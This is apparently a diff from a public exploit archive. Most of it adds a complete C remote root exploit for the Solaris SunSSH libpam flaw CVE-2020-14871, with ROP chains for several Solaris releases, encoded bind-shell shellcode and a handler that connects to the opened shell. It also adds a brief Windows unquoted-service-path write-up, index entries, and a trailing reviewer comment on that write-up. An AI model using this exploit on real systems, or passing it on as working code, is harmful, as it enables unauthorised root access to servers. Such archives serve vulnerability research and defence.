+ * usernames into the buffer via modules (authtok_get) without bounds checks.
+ * This issue can be reached remotely pre-authentication via SunSSH when
+ * "keyboard-interactive" is enabled to use PAM based authentication. The
+ * vulnerability was discovered being actively exploited by FireEye in the
+ * wild and is part of an APT toolkit called "EVILSUN". The vulnerability
+ * is present in both SPARC/x86 versions of Solaris & others (eg. illumos).
+ * This exploit uses ROP gadgets to disable nxstack through mprotect on x86
+ * and a helper shellcode stub. The configuration in a default Solaris 
+ * install is vulnerable. The exploit makes use of libssh2 and tested on
+ * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable 
+ * SunSSH implementation and versions later than 11.1 have updated SunSSH
+ * code that prevents the issue being triggered.
+ *
+ * e.g.
+ *  ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2
+ *  [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
+ *  [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86'
+ *  [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes
+ *  [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e
+ *  [+] entering keyboard-interactive authentication.
+ *  [-] number of prompts: 1
+ *  [-] prompt 0 from server: 'Please enter user name: '
+ *  [-] shellcode length 193 bytes
+ *  [-] rop chain length 68
+ *  [-] exploit buffer length 580
+ *  [-] sending exploit magic buffer... wait
+ *  [+] exploit success, handling payload...
+ *  [-] connected.. enjoy :)
+ *  SunOS solaris 5.11 11.0 i86pc i386 i86pc
+ *   6:49pm  up 53 min(s),  1 user,  load average: 0.01, 0.01, 0.01
+ *  helpdesk   console      Nov 27 17:57
+ *  uid=0(root) gid=0(root)
+ *
+ * -- Hacker Fantastic (https://hacker.house)
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <ctype.h>
+#include <getopt.h>
+#include <time.h>
+#include <signal.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <sys/select.h>
+#include <arpa/inet.h>
+#include <sys/time.h>
+#include <libssh2.h>
+
+int sd = -1;
+int oldsd = -1;
+int ishell = -1;
+char* buf;
+char* payload;
+char* retaddr;
+struct sockaddr_in sain;
+
+struct target {
+	char* name;
+	char* ropchain;
+};
+
+struct shellcode {
+	char* name;
+	char* shellcode;
+};
+
+void spawn_shell(int);
+void bindshell_setup(short);
+void on_alarm(int);
+void on_interupt(int);
+void prepare_payload();
+
+const int targetno = 5;
+struct target targets[] = {
+	{"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86",
+	"\x41\x42\x43\x44"  // %ebx
+	"\x45\x46\x47\x48"  // %esi 
+	"\x50\x51\x52\x53"  // %ebp
+	"\xa7\x0e\x06\x08"  // pop %ecx, pop %edx, pop %ebp
+	"\x9c\x3e\x04\x08"  // ptr to (0x?, 0x?, 0x8044cf0, 0x7) 
+	"\x01\x01\x04\x08"  // %edx unused, must be writeable addr
+	"\x41\x42\x43\x44"  // %ebp unused var 
+	"\x93\xdb\xc8\xfe"  // pop %edx ; ret
+	"\x01\x30\x04\x08"  // ptr to 0x08043001 mprotect arg
+	"\x1a\xe7\x0b\xfe"  // dec %edx ; ret 
+	"\x79\x41\xfe\xfe"  // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret
+	"\x93\xdb\xc8\xfe"  // pop %edx ; ret 
+	"\x01\x30\x04\x08"  // ptr to shellcode
+	"\xe0\xe8\x3e\xfe"  // mov $0x72,%al 
+	"\x64\x7c\xc3\xfe"  // inc %eax ; ret
+        "\x64\x7c\xc3\xfe"  // inc %eax ; ret	
+	"\x22\x9d\xd3\xfe"},// sysenter
+	{"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86",
+	"\x41\x42\x43\x44"  // %ebx overwrite unused
+	"\x41\x42\x43\x44"  // %esi overwrite unused
+	"\xf8\x32\x04\x08"  // %ebp overwrite unused
+	"\xb7\xf9\x05\x08"  // pop %ecx ; pop %edx ; pop %ebp ; ret
+	"\x7e\x36\x02\x04"  // ptr/2 to (0x?, 0x0, 0x1000, 0x7) 
+	"\x01\x30\x04\x08"  // ptr for %edx
+	"\x44\x43\x42\x41"  // ptr for %ebp unused
+	"\xe4\xd4\xde\xfe"  // dec %edx ; add %ecx, %ecx ; ret
+	"\x19\x42\xfe\xfe"  // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret
+	"\xb8\xf9\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xeb\x30\x04\x08"  // shellcode ptr for %edx
+	"\x1c\x33\x04\x08"  // %ebp & used by "leave"
+        "\x84\x98\x51\xfe"  // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret
+        "\x41\x42\x43\x44"  // %esi unused
+        "\xe0\x30\x04\x08"  // shellcode ptr to %ebx                              
+        "\xe8\x32\x04\x08"  // ptr into %ebp        
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret  
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret
+        "\x11\x3f\xfe\xfe"  // sub $0x2,%eax ; ret
+	"\xfe\xf8\xcf\xfe"},// sysenter
+	{"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86",
+	"\xc3\x31\x04\x08"  // overwrite %ebp unused
+	"\xa3\x6c\xd8\xfe"  // mov $0x74, %eax ; ret
+	"\x29\x28\x07\x08"  // pop %ebx ; ret
+	"\xf0\xff\xaf\xfe"  // 0x0a writen to address, unused gadget
+	"\x08\xba\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\x01\x30\x04\x08"  // %edx pointer to page
+	"\xb8\x31\x04\x08"  // unused %ebp value
+	"\xaa\x4c\x68\xfe"  // pop %ecx ; ret
+	"\xe0\x6e\x04\x08"  // ptr (0x?,0x0,0x1000,0x7)
+	"\x61\x22\x07\x08"  // dec %edx ; ret
+	"\x8b\x2d\xfe\xfe"  // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret
+	"\xa3\x6c\xd8\xfe"  // mov $0x74, %eax ; ret
+	"\x08\xba\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xc3\x31\x04\x08"  // shellcode addr for %edx
+	"\xc3\x31\x04\x08"  // unused %ebp value
+	"\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx)
+	{"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86",
+	"\xc3\x31\x04\x08"  // overwrite %ebp unused
+	"\x73\x6a\xd7\xfe"  // mov $0x74, %eax ; ret
+	"\xb1\x26\x07\x08"  // pop %ebx ; ret
+	"\xff\x01\xac\xfe"  // write garbage here, unused gadget
+	"\x98\xb9\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xff\x2f\x04\x08"  // %edx pointer to page
+	"\xc3\x31\x04\x08"  // unused %ebp value
+	"\x57\xaa\xe4\xfe"  // pop %ecx ; ret
+	"\x94\x11\x5f\xfe"  // ptr rwx (0x?,0x04b,0xe50,0x7)
+	"\xee\x6a\x65\xfe"  // inc %edx ; ret
+	"\x9b\xc5\xc1\xfe"  // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret
+	"\x73\x6a\xd7\xfe"  // mov $0x74, %eax ; ret
+	"\x86\xae\xe5\xfe"  // pop %edx ; ret
+	"\xc3\x31\x04\x08"  // shellcode return address for %edx
+	"\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx)
+	{"Solaris all Sun_SSH_1.x.x debug crash target",
+	"\x41\x42\x43\x43"  // %ebp ptr
+	"\x78\x79\x80\x81"} // %eip ptr
+};
+
+const int shellno = 4;
+
+struct shellcode shellcodes[] = {
+	{"Solaris x86 bindshell tcp port 9999",
+	/* mprotect magic stub necessary for payloads expecting +x stack */
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
+	"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
+	"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
+	/* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07);
+	   ==================================================================
+		xorl %eax, %eax
+  		xorl %ecx, %ecx
+  		movl $0x08041001, %ebx
+  		movw $0x7001, %ax
+  		movb $0x7,%cl
+  		dec %ebx
+  		dec %eax
+  		pushl %ecx
+  		pushl %eax
+  		pushl %ebx
+  		pushl %ebx
+  		movl %esp, %ecx
+  		xorl %eax, %eax
+		movb $0x74, %al
+		int $0x91
+	*/
+	/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */
+	"\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde"
+        "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e"
+        "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69"
+        "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
+        "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
+        "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
+        "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
+        "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
+        "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
+        "\xb1\x3a\xfe\xd7\x2a\x95"},
+	{"Solaris x86 bindshell tcp port 8080",
+	/* mprotect magic stub necessary for payloads expecting +x stack */
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
+	"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
+	"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
+	/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */
+	"\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde"
+	"\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e"
+	"\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69"
+	"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
+	"\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
+	"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
+	"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
+	"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
+	"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
+	"\xb1\x3a\xfe\xd7\x44\x60"},
+	/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ 
+	{"Solaris 11.0 x86 bindshell tcp port 9999", 
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
+	"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
+	"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
+	"\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
+	"\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd"
+	"\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6"
+	"\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c"
+	"\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7"
+	"\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35"
+	"\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72"
+	"\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97"
+	"\x9f\x56\x1b\x2c\xdf\x8f"},
+	/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
+	{"Solaris 11.0 x86 bindshell tcp port 4444", 
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
+	"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
+	"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
+	"\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
+	"\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1"
+	"\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2"
+	"\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46"
+	"\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47"
+	"\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae"
+	"\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5"
+	"\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0"
+	"\x0a\x39\x6b\xeb\x53\x6b"}
+};
+
+void spawn_shell(int sd) {
+#define sockbuflen 2048
+	int rcv;
+	char sockbuf[sockbuflen];
+	fd_set readfds;
+	memset(sockbuf,0,sockbuflen);
+	snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n");
+	write(sd,sockbuf,strlen(sockbuf));
+	while (1) {
+		FD_ZERO(&readfds);
+		FD_SET(0,&readfds);
+		FD_SET(sd,&readfds);
+		select(255,&readfds,NULL,NULL,NULL);
+		if (FD_ISSET(sd, &readfds)) {
+			memset(sockbuf,0,sockbuflen);
+			rcv = read(sd,sockbuf,sockbuflen);
+			if (rcv <= 0) {
+              			printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m");
+              			exit(-1);
+            		}
+			printf("%s",sockbuf);
+			fflush(stdout);
+		}
+      		if(FD_ISSET(0,&readfds)) {
+			memset(sockbuf,0,sockbuflen);
+			read(0,sockbuf,sockbuflen);
+			write(sd,sockbuf,strlen(sockbuf));
+        	}
+    	}
+}
+
+void bindshell_setup(short port){
+	oldsd = sd;
+        sd = socket(AF_INET,SOCK_STREAM,0);
+        sain.sin_port = htons(port);
+        if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){
+		printf("[!] fatal bind shell failed\n\e[0m");
+                exit(-1);
+        }
+	printf("[-] connected.. enjoy :)\e[0m\n");
+        spawn_shell(sd);
+}
+
+void on_alarm(int signum){
+	printf("[+] exploit success, handling payload...\n");
+	if(ishell==0||ishell==2){
+		bindshell_setup(9999);
+	}
+	if(ishell==1||ishell==3){
+		bindshell_setup(8080);
+	}
+	printf("[-] exploit complete\n\e[0m");
+	exit(0);
+}
+
+void on_interrupt(int signum){
+	printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m");
+	if(sd){
+		close(sd);
+	}
+	if(oldsd){
+		close(oldsd);
+	}
+	exit(0);
+}
+
+void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */
+#define payload_size 4096
+	int len = strlen(payload);
+	buf = malloc(payload_size);
+	char randchar = 'A';
+	char* randbuf = malloc(2);
+	if(!buf||!randbuf){
+		printf("[!] fatal payload buffer error\n");
+		exit(-1);
+	}
+	srand(time(NULL));
+	memset(buf,'\x00',payload_size);
+	memset(randbuf,0,2);
+	printf("[-] shellcode length %d bytes\n",len);
+	if(len < 512 && payload_size > 1024){
+		memcpy(buf,payload,len);
+		for(int i =0;i <= (512 - len);i++){
+ 			randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52];
+			memcpy(randbuf,&randchar,1);
+			strcat(buf,randbuf);
+		}
+		len = strlen(retaddr);
+		printf("[-] rop chain length %d\n",len);
+		if(len + 512 < payload_size){
+			memcpy((void*)(long)buf+512,(void*)retaddr,len);
+			len = strlen(buf);
+			printf("[-] exploit buffer length %d\n",len);
+		}
+		else{
+			printf("[!] exploit buffer miscalculated\n");
+			exit(-1);
+		}
+	}
+	else{
+		printf("[!] exploit buffer miscalculated\n");
+		exit(-1);
+	}
+}
+
+static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) {
+	int i = 0;
+	signal(SIGALRM, &on_alarm);
+	printf("[+] entering keyboard-interactive authentication.\n");
+	printf("[-] number of prompts: %d\n", num_prompts);
+	printf("[-] prompt %d from server: '", i);
+	fwrite(prompts[i].text, 1, prompts[i].length, stdout);
+	printf("'\n");
+	prepare_payload();
+	//uncomment to pause for gdb debugging
+	//sleep(10);
+	responses[i].text = strdup(buf);
+	responses[i].length = strlen(buf);
+	printf("[-] sending exploit magic buffer... wait\n");
+	alarm(5);
+}
+
+int main(int argc,char **argv){
+	int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0;
+	char* host;
+	int i, type, exitcode;
+	unsigned long hostaddr;
+	const char *fingerprint;
+	LIBSSH2_SESSION *session;
+	LIBSSH2_CHANNEL *channel;
+	char *exitsignal = (char *)"none";
+	size_t len;
+	LIBSSH2_KNOWNHOSTS *nh;
+	static struct option options[] = {
+		{"server", 1, 0, 's'},
+		{"port", 1, 0, 'p'},
+		{"target", 1, 0, 't'},
+		{"shellcode", 1, 0, 'x'},
+		{"help", 0, 0,'h'}
+        };
+	printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n");
+	while(rc != -1) {
+	        rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index);
+        	switch(rc) {
+               		case -1:
+	                        break;
+        	        case 's':
+				if(ihost==0){
+					host = malloc(strlen(optarg) + 1);
+					if(host){
+						sprintf(host,"%s",optarg);
+						ihost = 1;
+					}
+				}
+               			break;
+	                case 'p':
+				port = atoi(optarg);
+                	        break;
+			case 'x':
+				if(ishell==-1) {
+					rc = atoi(optarg);
+					switch(rc){
+						case 0:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 1:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 2:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 3:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+
+						default:
+							printf("[!] Invalid shellcode selection %d\n",rc);
+							exit(0);
+							break;
+						}
+				}
+				break;
+	                case 't':
+				if(itarg==0){
+					rc = atoi(optarg);
+					switch(rc){
+						case 0:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 1:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 2:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 3:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 4:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						default:
+							printf("[!] Invalid target selection %d\n", rc);
+							exit(0);
+							break;
+					}
+					itarg = 1;
+				}
+        	                break;
+			case 'h':
+				printf("[!] Usage instructions.\n[\n");
+				printf("[ %s <required> (optional)\n[\n[   --server|-s <ip/hostname>\n",argv[0]);
+				printf("[   --port|-p (port)[default 22]\n[   --target|-t <target#>\n");
+				printf("[   --shellcode|-x <shellcode#>\n[\n");
+				printf("[ Target#'s\n");
+				for(i = 0;i <= targetno - 1;i++){
+					printf("[ %d \"%s\"\n",i,targets[i]);
+				}
+				printf("[\n[ Shellcode#'s\n");
+				for(i = 0;i <= shellno - 1;i++){
+					printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode));
+				}
+				printf("\e[0m");
+				exit(0);
+				break;
+			default:
+                		break;
+	        }
+	}
+	if(itarg != 1 || ihost  != 1 || ishell < 0){
+		printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]);
+		exit(-1);
+	}
+	rc = libssh2_init(0);
+	hostaddr = inet_addr(host);
+	sd = socket(AF_INET, SOCK_STREAM, 0);
+	sain.sin_family = AF_INET;
+	sain.sin_port = htons(port);
+	sain.sin_addr.s_addr = hostaddr;
+	if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) {
+		fprintf(stderr, "[!] failed to connect!\n");
+		goto shutdown;
+	}
+	session = libssh2_session_init();
+	libssh2_session_set_blocking(session, 1);
+	while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN);
+	if(rc) {
+		printf("[!] failure establishing ssh session: %d\n", rc);
+		goto shutdown;
+	}
+	nh = libssh2_knownhost_init(session);
+	if(!nh) {
+		printf("[!] failure on libssh2 init\n");
+		goto shutdown;
+	}
+	fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
+	printf("[+] ssh host fingerprint: ");
+	for(i = 0; i < 20; i++) {
+		printf("%02x", (unsigned char)fingerprint[i]);
+	}
+	printf("\n");
+	libssh2_knownhost_free(nh);
+	signal(SIGINT,&on_interrupt);
+	libssh2_userauth_keyboard_interactive(session, "", &kbd_callback);
+	printf("[!] exploit failed, core maybe on target!\n");
+shutdown:
+	if(sd){
+		close(sd);
+	}
+	printf("\e[0m");
+	return -2;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/49248.txt b/exploits/windows/local/49248.txt
new file mode 100644
index 000000000..3b3f8ec5f
--- /dev/null
+++ b/exploits/windows/local/49248.txt
@@ -0,0 +1,29 @@
+# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
+# Date: 2020-10-14
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://systemexplorer.net/
+# Software Link:  http://systemexplorer.net/download/SystemExplorerSetup.exe
+# Version: Version 7.0.0
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Service info:
+
+C:\Users\m507>sc qc SystemExplorerHelpService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SystemExplorerHelpService
+        TYPE               : 20  WIN32_SHARE_PROCESS
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : System Explorer Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
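Review bot: The closing claim under `# Exploit:` that code runs "during startup or reboot" is not supported by the `sc qc` output above it, which reports `START_TYPE : 3 DEMAND_START`, so the service binary is launched only when the service is started on demand. The write-up also omits the precondition that decides whether the issue is reachable at all: a low-privileged user must be able to create files in a parent directory of the unquoted `BINARY_PATH_NAME`, which default ACLs on those directories normally do not allow. I would reword the last line to `Unquoted service path running as LocalSystem; impact depends on write access to a parent directory of the binary, and the service is DEMAND_START.` A one-line remediation note would also help defenders: wrap the service's configured binary path in double quotes and audit the ACLs on the directories leading to it.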
diff --git a/files_exploits.csv b/files_exploits.csv
index 68282e8af..1bda1cfd5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11230,6 +11230,8 @@ id,file,description,date,author,type,platform,port
 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
+49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
+49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18339,6 +18341,7 @@ id,file,description,date,author,type,platform,port
 49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows,
 49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
 49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
+49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
